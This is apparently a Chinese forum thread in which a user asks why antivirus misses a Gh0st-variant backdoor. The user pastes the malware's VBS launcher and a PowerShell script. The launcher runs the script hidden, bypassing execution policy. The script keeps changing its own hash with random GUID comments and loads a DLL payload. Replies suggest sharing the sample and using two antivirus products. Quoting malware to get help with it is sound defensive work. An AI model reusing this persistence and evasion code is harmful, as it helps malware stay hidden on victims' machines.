为啥病毒查不出来

防火墙上看到主机有病毒【后门软件Gh0st变种之毒鼠请求通信】记录
找到了主机，并进行360全盘杀毒，结果发现还是有
后面根据netstat 找到进程，并一层一层找，发现就是个自动计划，以及ps1执行文件，为啥这都扫不出来

发不了图片也发不来附件额
一个Promotions.ps1，配合logs.vbs，以及一个update.dll。
然后好像会冒充自动更新的弹窗在右下角弹出

Set objShell = CreateObject("WScript.Shell")
RoamingPath = objShell.ExpandEnvironmentStrings("%APPDATA%")
FilePath = RoamingPath & "\Promotions\Promotions.ps1"
objShell.Run "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File """ & FilePath & """", 0, False

--------------------

# cd446a9f-0f7a-4d6c-9690-83345ad03192
# 986c8e2a-44c2-4fea-b39c-92a30683020a
# df8ffc26-00fc-410b-ba61-b2930632657a
# 0877ce74-ec31-4e59-aa33-753341bc8395
# ee50f5b8-17c7-431c-9b7d-480f4287b475
# 068d6abc-de0f-4610-bd2e-7e7487bb125b
# 8514e670-b369-4876-a875-e29d0d937b16
# 595e9138-d7d7-4127-98b2-242a86aea55c
# 9e95823a-c5c5-4279-a3c9-e30995c22003
# 65bb70fe-2ea2-444c-9a9b-581f9090fc71
# 9eba9004-601f-4a0a-9779-4310a646ee93
# 39e43e28-213b-4b5b-8b5f-7f69de41221e
# a84c1659-7e13-4680-bbbf-36f9e998ebfe
# 153145aa-2415-4473-943a-7d4e45efebd8
# 5a5e05f6-75b7-4439-b374-204938e96f40
# e3e92115-d175-49d6-a7d3-78ef769c3ace
# 02c0ddfe-2458-4953-93b4-b7bdf5b8fb4d
# e4ea483c-b327-499d-b68e-a21577220d24
# 2de2f16a-e75a-48cc-9440-bf9c725b5cac
# 58fb079f-76b4-4eb8-831f-c404a1c26c1b
# ea0bd099-3dcf-4b5d-b667-c209c9c39d05
# 5cf23d82-6a6e-46a9-9c5e-35e25f58e791
# 817a78c3-5ae9-45f2-80de-c70b8aba5132
# 7119dd13-55ae-4c0e-8467-659363ec7c11
# 3c5432a3-8eba-4a2c-85b5-957c92b9e916

$scriptPath = $MyInvocation.MyCommand.Path
$fileContent = Get-Content -Path $scriptPath -Raw
$uuid = [guid]::NewGuid().ToString()
$randomCommentHeader = "`r`n# $uuid"
$randomCommentFooter = "`r`n#  $uuid"
$fileContent = $randomCommentHeader + $fileContent + $randomCommentFooter
Set-Content -Path $scriptPath -Value $fileContent
$RoamingDir = [System.Environment]::GetFolderPath('ApplicationData')
$DllPath = Join-Path $RoamingDir "Promotions\Update.dll"
$DllPathEscaped = $DllPath -replace '\\', '\\\\'
#asd
$code = @"
using System;
using System.Runtime.InteropServices;
public class DllInvoker
{
    [DllImport("$DllPathEscaped", CallingConvention = CallingConvention.Cdecl)]
    public static extern void TCGamerUpdateMain();
}
"@
Add-Type -TypeDefinition $code
[DllInvoker]::TCGamerUpdateMain()
$md5 = [System.Security.Cryptography.MD5]::Create()
$fileStream = [System.IO.File]::OpenRead($scriptPath)
$hashBytes = $md5.ComputeHash($fileStream)
$fileStream.Close()



#  3c5432a3-8eba-4a2c-85b5-957c92b9e916

#  7119dd13-55ae-4c0e-8467-659363ec7c11

#  817a78c3-5ae9-45f2-80de-c70b8aba5132

#  5cf23d82-6a6e-46a9-9c5e-35e25f58e791

#  ea0bd099-3dcf-4b5d-b667-c209c9c39d05

#  58fb079f-76b4-4eb8-831f-c404a1c26c1b

#  2de2f16a-e75a-48cc-9440-bf9c725b5cac

#  e4ea483c-b327-499d-b68e-a21577220d24

#  02c0ddfe-2458-4953-93b4-b7bdf5b8fb4d

#  e3e92115-d175-49d6-a7d3-78ef769c3ace

#  5a5e05f6-75b7-4439-b374-204938e96f40

#  153145aa-2415-4473-943a-7d4e45efebd8

#  a84c1659-7e13-4680-bbbf-36f9e998ebfe

#  39e43e28-213b-4b5b-8b5f-7f69de41221e

#  9eba9004-601f-4a0a-9779-4310a646ee93

#  65bb70fe-2ea2-444c-9a9b-581f9090fc71

#  9e95823a-c5c5-4279-a3c9-e30995c22003

#  595e9138-d7d7-4127-98b2-242a86aea55c

#  8514e670-b369-4876-a875-e29d0d937b16

#  068d6abc-de0f-4610-bd2e-7e7487bb125b

#  ee50f5b8-17c7-431c-9b7d-480f4287b475

#  0877ce74-ec31-4e59-aa33-753341bc8395

#  df8ffc26-00fc-410b-ba61-b2930632657a

#  986c8e2a-44c2-4fea-b39c-92a30683020a

#  cd446a9f-0f7a-4d6c-9690-83345ad03192

您好，您加下我的微信，把样本发给我

360还是有少不出的东西，我是同时安装了360卫士和卡巴斯基杀毒，配合使用。360主防御，卡巴定时扫全盘，果然有些网站会偷偷下载脚本运行，按照卡巴的名字是一些广告插件或者流氓插件